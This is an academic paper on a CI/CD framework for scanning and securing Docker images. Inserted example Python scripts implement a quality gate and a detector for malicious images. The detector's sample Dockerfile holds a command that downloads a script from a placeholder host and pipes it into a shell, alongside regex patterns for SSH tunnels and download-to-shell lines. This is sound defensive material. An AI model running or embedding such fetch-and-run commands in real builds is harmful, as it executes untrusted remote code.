Framework to Secure Docker Containers
Conference Paper · July 2021
DOI: 10.1109/WorldS451998.2021.9514041
1st Manish Kumar Abhishek, Department of CSE, Koneru Lakshmaiah Education Foundation, Vaddeswaram, India, manish.abhishek@gov.in
2nd D. Rajeswara Rao, Department of CSE, Koneru Lakshmaiah Education Foundation, Vaddeswaram, India, rajeshpitam@gmail.com
Abstract—Docker is one of the key components for application deployment using CI/CD pipelines. Wherever containers are going to be used, the Docker engine is always the first choice, but on the other hand the security of the Docker images from which the application is deployed is always a concern. In cloud computing, validation of Docker image security is paramount. Container virtualization, which is based on operating system virtualization, is not as secure as hypervisor virtualization. In this paper we propose a framework which uses an architecture including plugins and a CI/CD pipeline to deploy the application and to ensure the security of the application bundled as a Docker image. It is applied from the start of application development until deployment, including a plugin for the Docker build, bundling the application in the form of images along with the required libraries, and pushing the images to a Docker registry. Jenkins jobs are used for getting the build and then for deployment. For validation, we came up with vulnerable Docker images and validated them against our architecture with the proposed model to compare the results. In later sections, we have also considered container security measures.

Keywords—Containers, Continuous Integration (CI), Continuous Deployment (CD), Docker, Jenkins, Virtualization

I. INTRODUCTION

In today's containerization world, application development and deployment using a CI/CD pipeline is one of the common requirements that everyone is looking at. Containers are very lightweight in nature as they are totally based on Operating System (OS) virtualization and do not need the whole configuration for their dependent binaries. They have been significantly adopted for the whole software lifecycle, from development to deployment phases, including upgrades, fix packs and much more. They are in trend and making a buzz in the entire IT world. Containers have been considered a suitable choice even for High Performance Computing applications via their dynamic allocation at the infrastructure level in cloud computing [1]. Instead of having virtual machines using a hypervisor, containers have been given more weight to make the environment scalable and suitable for failover use cases. A container executes on an isolated layer of the operating system to avoid the overhead. Containers are very portable in nature in comparison to virtual machines, which basically use a whole individual operating system, including its own libraries and binaries, as an individual layer on top of the hardware layer via the hypervisor. This is one of the major reasons behind the adoption of containers in the virtualization world.

Docker is an open source platform to facilitate applications in packages, none other than containers. It consists of multiple lightweight containers. Docker consists of several modules which allow bundling the application in the form of an image along with its dependencies, tagging of images, uploading and downloading of images to/from Docker Hub or a private registry, their execution and even persisting the running state in terms of updates to use later. Docker commands need to be executed to achieve all these tasks, and a Dockerfile is used to bundle all the required dependencies and libraries. For software deployment using Docker, the development community has created Docker Hub, which is used as a repository to persist Docker images. Nowadays, for software deployment, features are split in terms of microservices to achieve code reusability and independent deployment via containers. Every container represents one individual process holding its own process id during its execution. It is recommended to have one container per microservice holding an individual feature/module or a set of them.

This requirement of using containers to bundle the application in the form of a Docker image raises a security concern for its distribution. Software architects are also encouraging the inclusion of risk analysis which considers the distribution pipeline as a malicious one. In this paper, the proposed framework is based on a multi-layer security architecture including a private registry to which images are pushed to address the vulnerabilities. For application deployment, it is based on several stages wrapped as a Jenkins job in terms of a CI/CD pipeline to evaluate the bundled Docker images that are pushed later to Docker Hub, which eliminates the push and continuous reuse of vulnerable Docker images. Image selection along with malicious content has also been analysed and evaluated using the CI/CD pipeline to figure out the abnormal execution environment, followed by security standards and practices with container considerations. The remaining sections of this paper are organised as follows: Section 2 describes the background of security analysis and concerns with respect to Docker images. Section 3 is about the proposed framework model using which the whole architecture has been defined. Section 4 describes the evaluation methodology, results and the related work. The conclusion is provided in Section 5.

II. SECURITY ANALYSIS

It is difficult to move a whole monolithic application to a container in comparison to microservices. With a monolithic application, scalability and code reusability are always a concern, as over the software lifecycle the whole application grows and it is difficult to maintain the legacy code over a period of time. Moving an application running on a physical server to a Docker container requires the identification of all its elementary components. Figure 1 shows the abstracted architecture for Docker containers. With an MVC architecture, every layer is divided into containers. For example, the database layer will be in one container, the web app in another, and a separate one is needed for the component holding the business logic along with its server. It has been analysed and found that examination of files or executions is one of the forms of malware analysis to find out the probable cause of security compromises. It is mainly categorized into two parts with respect to images. One of them is static, where the second one is at run time and can be called behavioural analysis.
Fig. 1: Docker containers high level architecture.

A. Static

During static analysis, the data is examined prior to its execution. It holds a set of predefined actions. The CVE system is one example [2]. In the past, software vulnerabilities were often computed by scoring metrics. Multiple scoring metrics were computed to find out the vulnerability. The third-party jars used as a part of software development were also considered for security issues. The Common Vulnerabilities and Exposures (CVE) system is used against the inconsistent results to find out the security issues and vulnerabilities. CVE internally provides the framework to share these details publicly [3]. The most common option to find out the security issues is using the CVE system to scan the Docker images regularly, so that they can easily be addressed before application deployment. Appropriate actions can be taken against these vulnerabilities. SonarQube is another example, which continuously examines the code quality. It helps to find out unreachable code, memory leaks, boundary value violations, code smells, and vulnerabilities and bugs categorized in the form of blocker, critical, major and minor. Static analysis is also helpful to find out malicious files based on hashes, signatures and file extensions. It mainly analyses the security issues at the application development level and before deployment.

B. Dynamic

It is applicable after application development and refers to the container's behaviour. This analysis includes container monitoring, including port scans, consumption of resources in terms of CPU and memory, registry tracking, network activity and firewall rule monitoring. As it is related to containers and performed at execution level, the results can be more impactful. Even dynamic allocation of computing resources with respect to containers always helps us in their monitoring [4]. The Docker engine handles and takes care of container provisioning, where each container is well defined with its own computing resources [5] and is not going to impact other containers. Every container holds its own unique process id. Containers can impact the host if they are executed with admin or root privileges. On the other hand, if multiple containers are executed by the same user, they can also impact each other. If every container has its own network bridge with respect to the host physical network, a single container can consume the whole network and result in a network denial of service attack. One of the major issues is trusting the Docker image downloaded from Docker Hub, which is available publicly to all [6].

III. PROPOSED DESIGN

Here, we describe the designed framework architecture to address the analysed security issues or vulnerabilities via scanning the images and third-party jars regularly, fitted inside a model. A CI/CD pipeline has been created to track the whole workflow from development to deployment. Using this proposed architecture of our framework, it will minimize the cost as well as make security analysis fixes faster and transient to the user. Figure 2 shows the proposed architecture to secure Docker containers.

A. Continuous Integration (CI) Pipeline

The Continuous Integration pipeline is responsible for building the Docker image and pushing it to the private registry, with multiple stages within the pipeline itself. Once the code changes have been pushed to the code base repository, this pipeline will start. The first stage of the pipeline checks out the code changes implemented by the developer, then compiles them, runs the test cases, if any, and generates the SonarQube report. This report is the static analysis used to figure out code smells, bugs and security vulnerabilities. The report has the details of code coverage, coverage of the new code changes, issues, measures of reliability, security, maintainability and other application details. The issue types are bugs, vulnerabilities, code smells and security hotspots, with the details of unsafe arguments. Using this report with the details of the static analysis of the application code, we can easily address the security vulnerabilities even before creation of our Docker image. Once the issues have been addressed, we can go ahead with the later stages of the pipeline, i.e. Docker build, image tagging, pushing the images to the registry and updating the image versions to track the build. Instead of using the public registry, every organization can have a private registry to keep the images of its applications, which will make it more secure.
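The gate that sits between the SonarQube stage and the Docker build/tag/push stages, as an added example in Python rather than code from the paper: it combines the code report with the base-image scan and returns the decision the pipeline acts on. Record field names are assumptions, the sample records are constructed, and the thresholds are the ones the evaluation section reports (no blocker or critical finding, fewer than 16 minor findings on the CentOS image).

```python
"""Quality-gate stage of the CI pipeline above: decides whether the build
may continue to the docker build / tag / push stages. Added example, not
the paper's own code. Records are constructed to resemble SonarQube issue
and Anchore vulnerability exports (field names are assumptions); the
thresholds follow the rule reported in the evaluation section: no blocker
or critical finding, and fewer than 16 minor findings on the CentOS image."""
from collections import Counter

BLOCKING = {"BLOCKER", "CRITICAL"}   # severities that never pass the gate

def sonar_gate(issues):
    """issues: {"type": BUG|VULNERABILITY|CODE_SMELL|SECURITY_HOTSPOT,
    "severity": BLOCKER|CRITICAL|MAJOR|MINOR}. Returns (passed, reasons,
    warnings). Blocker/critical bugs and vulnerabilities fail the gate;
    hotspots are returned as warnings for manual review; code smells never
    block (the paper's report passed with 90 minor issues)."""
    counts = Counter((i["type"], i["severity"]) for i in issues)
    reasons, warnings = [], []
    for (itype, sev), n in sorted(counts.items()):
        if itype in ("BUG", "VULNERABILITY") and sev in BLOCKING:
            reasons.append(f"{n} {sev} {itype}")
        elif itype == "SECURITY_HOTSPOT":
            warnings.append(f"{n} {sev} security hotspot(s) need review")
    return not reasons, reasons, warnings

def image_gate(image, findings, max_minor=None):
    """findings: {"severity": ..., "package": ..., "cve": ...} from the image
    scanner. Any blocker/critical finding fails; when max_minor is given,
    that many or more MINOR findings fail as well (the CentOS rule uses 16).
    Without a limit only severity matters, which is how an image with 120
    non-critical findings can still pass."""
    by_sev = Counter(f["severity"] for f in findings)
    reasons = [f"{image}: {by_sev[s]} {s} finding(s)"
               for s in sorted(BLOCKING) if by_sev[s]]
    if max_minor is not None and by_sev["MINOR"] >= max_minor:
        reasons.append(f"{image}: {by_sev['MINOR']} MINOR findings (limit {max_minor})")
    return not reasons, reasons

def pipeline_gate(issues, image, findings, max_minor=None):
    """Combined decision: proceed to build/tag/push only when both the code
    report and the base-image scan pass."""
    code_ok, code_reasons, warnings = sonar_gate(issues)
    img_ok, img_reasons = image_gate(image, findings, max_minor)
    return {"proceed": code_ok and img_ok,
            "reasons": code_reasons + img_reasons, "warnings": warnings}

# Constructed sample data (not the contents of the paper's Figure 3).
SAMPLE_ISSUES = [
    {"type": "VULNERABILITY", "severity": "MAJOR"},      # an outdated jar
    {"type": "SECURITY_HOTSPOT", "severity": "MAJOR"},
    {"type": "SECURITY_HOTSPOT", "severity": "MINOR"},
] + [{"type": "CODE_SMELL", "severity": "MINOR"}] * 90

def scan_findings(n_minor, n_critical=0):
    """Build constructed scanner findings with placeholder CVE ids."""
    recs = [{"severity": "MINOR", "package": "pkg", "cve": f"CVE-PLACEHOLDER-{i}"}
            for i in range(n_minor)]
    recs += [{"severity": "CRITICAL", "package": "pkg", "cve": "CVE-PLACEHOLDER-X"}
             for _ in range(n_critical)]
    return recs

if __name__ == "__main__":
    print(pipeline_gate(SAMPLE_ISSUES, "centos:7", scan_findings(12), max_minor=16))
    print(pipeline_gate(SAMPLE_ISSUES, "centos:7", scan_findings(16), max_minor=16))
```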
B. Continuous Deployment (CD) Pipeline

The Continuous Deployment pipeline is responsible for the deployment of the application build, i.e. the result of the CI pipeline. In the first stage of this pipeline, it first checks the registry details, downloads the latest version of the image automatically and extracts the archived images. In the next stage, it deploys the image; if it already exists, it will uninstall/upgrade accordingly. Here we have also introduced our own automated API which takes care of identifying the security issues with Docker images. If we use a public Docker registry, this API helps us to find out the issues. It mainly executes that image to find out the traffic, network changes, firewall rules and other security scans before deploying it to the production environment. It is a kind of staging environment execution that helps us to find out the issues in the lab only, before releasing it for usage and deployment. We have analysed and found that mostly the images which include bash scripts responsible for creating secure shell (SSH) tunnels during container execution are the malicious ones. These images tend to download non-defined binaries and install shell code. To address this issue, we propose a small service which examines the Docker image and removes these kinds of binaries. We have used a sandbox in one of our cloud services to provide the isolation.

IV. EVALUATION AND RESULTS

Here, we evaluate our proposed architecture for determining the security vulnerabilities and hotspots related to Docker containers, including both static as well as dynamic resource allocation, usage of free computing resources for the application, performance, profiling, and queue throughput. Table I shows the details of the Docker images and their versions. We have used the PostgreSQL server for persistence as a database, CentOS 7 as the operating system, AdoptOpenJDK 11 for application development (basically a Maven build), Docker version 18.09.7, Nginx 1.10.3 and Jenkins server version 2.164.1.

TABLE I. DOCKER IMAGES AND THEIR VERSION USED FOR EVALUATION
Image          Version
CentOS         7.0
PostgreSQL     12.0
Docker         18.09.07
AdoptOpenJDK   11
Nginx          1.10.3
Jenkins        2.164.1

Fig. 2: Proposed model to secure Docker containers.

Fig. 3: SonarQube report details.

Figure 3 shows the SonarQube report that has been generated during the CI pipeline as one of the stages to find out the security hotspots and vulnerabilities. Even before the code check, one round of examination was done by the developers using a local server for analysis. For our application, we addressed most issues at development time only, but still found 2 security hotspots and 1 vulnerability due to the usage of old jars. For the CD pipeline, we have deployed our application having a REST server where the API has been exposed as an API gateway using Nginx. Swagger documentation is provided to invoke the REST APIs of the respective modules. As infrastructure we have deployed PostgreSQL, which is more secure. For CentOS images, we have defined a rule which makes sure that with a count of fewer than 16 minor vulnerabilities, the quality gate will be marked as true and we are good to use this image. As a result of our quality gate, we found that the PostgreSQL image is secure, and the Nginx image used by our application passed even with a total count of 120 security vulnerabilities, as they did not fall into the critical and blocker categories. The SonarQube report also passed even after having 90 minor issues. The Dockerfile has been analysed using the Anchore Engine's security policy. The PostgreSQL image cleared all the analysis and was found suitable to push to our private registry. For the Nginx-based application we were unable to push the image, as vulnerable checks were found for it.
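The image-examination service and the sandbox execution described for the CD pipeline, as an added example in Python that is not the paper's own service: a static pass over the Dockerfile flags SSH daemons, SSH tunnels and downloads of binaries from hosts outside the declared dependency sources, and a pass over run-time events flags the same daemon being executed and DNS lookups the dependencies do not explain. The allow-list, the event record format and the sample Dockerfile and events are constructed assumptions.

```python
"""Image-examination service from the CD pipeline above: a static pass over
the Dockerfile and a pass over events captured while the image runs in the
sandbox. Added example, not the paper's own service. The event record
format and the allow-list of dependency hosts are assumptions; the sample
Dockerfile and events below are constructed."""
import re

SSH_DAEMON = re.compile(r"(^|[\s/;&|\"'])(sshd|dropbear|service\s+ssh\s+start)\b")
SSH_TUNNEL = re.compile(r"\b(autossh|ssh)\b[^\n;&|]*\s-[a-zA-Z]*[RLD]\b")
DOWNLOAD = re.compile(r"\b(curl|wget)\b[^;&|]*?https?://([^\s/'\"]+)")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")

def instructions(dockerfile):
    """Yield (INSTRUCTION, argument) pairs with backslash continuations joined."""
    text = re.sub(r"\\\s*\n", " ", dockerfile)
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            ins, _, arg = line.partition(" ")
            yield ins.upper(), arg.strip()

def examine_dockerfile(dockerfile, allowed_hosts):
    """Findings for RUN/CMD/ENTRYPOINT lines that start an SSH daemon, open an
    SSH tunnel, pipe a download into a shell, or fetch from a host that is
    not a declared dependency source (a 'non-defined binary')."""
    findings = []
    for ins, arg in instructions(dockerfile):
        if ins not in ("RUN", "CMD", "ENTRYPOINT"):
            continue
        if SSH_DAEMON.search(arg):
            findings.append((ins, "starts an SSH daemon"))
        if SSH_TUNNEL.search(arg):
            findings.append((ins, "opens an SSH tunnel"))
        if PIPE_TO_SHELL.search(arg):
            findings.append((ins, "pipes a download into a shell"))
        for _, host in DOWNLOAD.findall(arg):
            if host not in allowed_hosts:
                findings.append((ins, f"downloads from undeclared host {host}"))
    return findings

def examine_runtime(events, allowed_hosts):
    """events: sandbox records {"t": seconds, "kind": "exec"|"dns", ...}.
    Flags an SSH daemon being executed and DNS lookups that the declared
    dependencies do not explain (the paper's DNS-based finding)."""
    findings = []
    for ev in events:
        if ev["kind"] == "exec" and SSH_DAEMON.search(ev["argv"]):
            findings.append((ev["t"], "SSH daemon executed", ev["argv"]))
        elif ev["kind"] == "dns" and ev["name"] not in allowed_hosts:
            findings.append((ev["t"], "DNS lookup of undeclared host", ev["name"]))
    return findings

# Constructed inputs: hosts the build is declared to depend on, a suspicious
# Dockerfile, and a 25-second sandbox trace. Hostnames are placeholders.
ALLOWED = {"repo.maven.apache.org", "mirror.centos.org"}
DOCKERFILE = """FROM centos:7
RUN yum install -y java-11-openjdk openssh-server && \\
    curl -sSL http://cdn.example-placeholder.net/agent.sh | sh
COPY app.jar /opt/app.jar
ENTRYPOINT ["/usr/sbin/sshd", "-D"]
"""
EVENTS = [
    {"t": 1, "kind": "exec", "argv": "/usr/sbin/sshd -D"},
    {"t": 3, "kind": "dns", "name": "repo.maven.apache.org"},
    {"t": 8, "kind": "dns", "name": "pool.example-placeholder.net"},
]

if __name__ == "__main__":
    for f in examine_dockerfile(DOCKERFILE, ALLOWED) + examine_runtime(EVENTS, ALLOWED):
        print(f)
```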
We have also used VirusTotal as an antivirus engine to scan the images and found malicious content. Figure 4 shows the scanning results performed on the Docker images to find out the malicious content. One of the root causes found was the use of old versions of a few jars. Wherever possible, always try to use the latest stable version of third-party jars. Third-party jars need to be upgraded regularly per release. The figure shows the results obtained using VirusTotal, i.e. the antivirus engine. As the CentOS, Java, Nginx and node images are supported by the Docker registry by default but are available publicly, they were scanned before being pushed into our private registry. The application images including all dependencies/libraries were found malicious mainly due to the start pod, probe scripts and old jars.

Fig. 4: Docker image scan results for malicious content.

Fig. 5: Dynamic analysis for Docker images at run time.

Figure 5 shows the results of the dynamic analysis API, including the process executions and file updates following 25 seconds of runtime. The file system is modified with respect to the image functionality and the performed actions. We have examined the system and computing resources, for example CPU metadata. We found the major issue once the images started the SSH daemon. For network traffic, we have uploaded a pcap captured during image execution that was found abnormal in nature. The observed finding was around DNS requests, and the image was found to be malicious as it was attempting cryptocurrency activity.

A. Related Work

For CVEs, there are multiple tools that can be used, for example OpenSCAP. It examines the system and, based on the data available in the National Vulnerability Database, determines the security vulnerabilities and policy violations. To scan Docker images, the oscap-docker tool can generally be used. Many tools are open source and can be easily integrated with a CI/CD pipeline for static and dynamic analysis. Even Docker itself officially offers trusted registries with security scans as per the CVE database, but we need to pay for that. A CI/CD pipeline is helpful in the case of Docker container security checks. Adethyaa and Jernigan [7] demoed a CI/CD pipeline for Docker images which uses AWS resources. Valance [8] also demonstrated the same with the help of the Anchore Engine to perform security analysis on Docker images. We observed a limitation with their process, i.e. the manual provisioning of AWS services and an inability to define custom security policies. With Valance's approach there is a lack of a source which really initiates the whole CI/CD pipeline. If we compare these with our proposed framework, the proposed architecture is automated, scalable, simplifies the complex workflows of application releases/upgrades and is flexible in nature.

V. CONCLUSION

For application development and deployment, Docker containers are the best choice, but on the other hand they are vulnerable, and there is a lack of appropriate tools that effectively quantify the risk. Major tools either need an enterprise license or are time consuming. On top of that, there is always a risk as they use third-party jars. Our proposed framework can be easily adopted in any organization as its core architecture to find out the bugs, security hotspots and vulnerabilities before pushing the Docker images to the registry, and also to scan the images to avoid issues at runtime. Malicious images will always try to download and execute non-defined dependencies and can be vulnerable. With our static and dynamic analysis approach, developers can easily examine the security defects and push non-malicious Docker images. The complete automated flow ensures that the security concerns are addressed without any manual intervention.

ACKNOWLEDGMENT

A special thanks to the Koneru Lakshmaiah Education Foundation for facilitating the required infrastructure, and to my guide for the helpful nature, as well as the other staff members who helped me to accomplish this research work.

REFERENCES

[1] M. Abhishek, "Containerization for shipping Scientific Workloads in Cloud," International Journal of Advanced Trends in Computer Science and Engineering, vol. 9, p. 5327, 2020, doi: 10.30534/ijatcse/2020/166942020.
[2] P. Mell, K. Scarfone, and S. Romanosky, "The Common Vulnerability Scoring System (CVSS) and Its Applicability to Federal Agency Systems," National Institute of Standards and Technology, Tech. Rep. Interagency Report 7435, August 2007.
[3] M. Abhishek, "Dynamic Allocation of High-Performance Computing Resources," International Journal of Advanced Trends in Computer Science and Engineering, vol. 9, pp. 3538-3543, 2020, doi: 10.30534/ijatcse/2020/159932020.
[4] R. A. Martin, "Managing vulnerabilities in networked systems," Computer, vol. 34, no. 11, pp. 32-38, Nov. 2001, doi: 10.1109/2.963441.
[5] M. Abhishek, "High Performance Computing using Containers in Cloud," International Journal of Advanced Trends in Computer Science and Engineering, vol. 9, p. 5686, 2020, doi: 10.30534/ijatcse/2020/220942020.
[6] D. Goodin, "Backdoored images downloaded 5 million times finally removed from Docker Hub," Ars Technica, June 2018. [Online]. Available: https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/
[7] V. Adethyaa and T. Jernigan, "Scanning Docker Images for Vulnerabilities using Clair, Amazon ECS, ECR, and AWS CodePipeline," AWS Compute Blog, November 2018. [Online]. Available: https://aws.amazon.com/blogs/compute/scanning-docker-images-for-vulnerabilities-using-clair-amazon-ecs-ecr-aws-codepipeline/
[8] J. Valance, "Using Anchore Policies to Help Achieve the CIS Docker Benchmark," Anchore Blog, May 2019. [Online]. Available: https://anchore.com/cis-docker-benchmark/
[9] K. Brady, S. Moon, T. Nguyen and J. Coffman, "Docker Container Security in Cloud Computing," 2020 10th Annual Computing and Communication Workshop and Conference (CCWC), Las Vegas, NV, USA, 2020, pp. 0975-0980, doi: 10.1109/CCWC47524.2020.9031195.
[10] J. Blackthorne, A. Bulazel, A. Fasano, P. Biernat, and B. Yener, "AVLeak: Fingerprinting Antivirus Emulators through Black-Box Testing," in 10th USENIX Workshop on Offensive Technologies, Austin, TX: USENIX Association, Aug. 2016.
[11] V. Rastogi, C. Niddodi, S. Mohan, and S. Jha, "New directions for container debloating," in Proceedings of the 2017 Workshop on Forming an Ecosystem Around Software Transformation (FEAST '17), New York, NY, USA: ACM, November 2017.
[12] S. Mullinix, E. Konomi, R. Townsend and R. Parizi, "On Security Measures for Containerized Applications Imaged with Docker," 2020.
[13] D. Huang, H. Cui, S. Wen and C. Huang, "Security Analysis and Threats Detection Techniques on Docker Container," 2019 IEEE 5th International Conference on Computer and Communications (ICCC), Chengdu, China, 2019, pp. 1214-1220, doi: 10.1109/ICCC47050.2019.9064441.
[14] A. R. Manu, J. K. Patel, S. Akhtar, V. K. Agrawal and K. N. B. Subramanya Murthy, "A study, analysis and deep dive on cloud PAAS security in terms of Docker container security," 2016 International Conference on Circuit, Power and Computing Technologies (ICCPCT), Nagercoil, 2016, pp. 1-13, doi: 10.1109/ICCPCT.2016.7530284.
[15] P. P. W. Pathirathna, V. A. I. Ayesha, W. A. T. Imihira, W. M. J. C. Wasala, N. Kodagoda and E. A. T. D. Edirisinghe, "Security testing as a service with Docker containerization," 2017 11th International Conference on Software, Knowledge, Information Management and Applications (SKIMA), Malabe, 2017, pp. 1-7, doi: 10.1109/SKIMA.2017.8294109.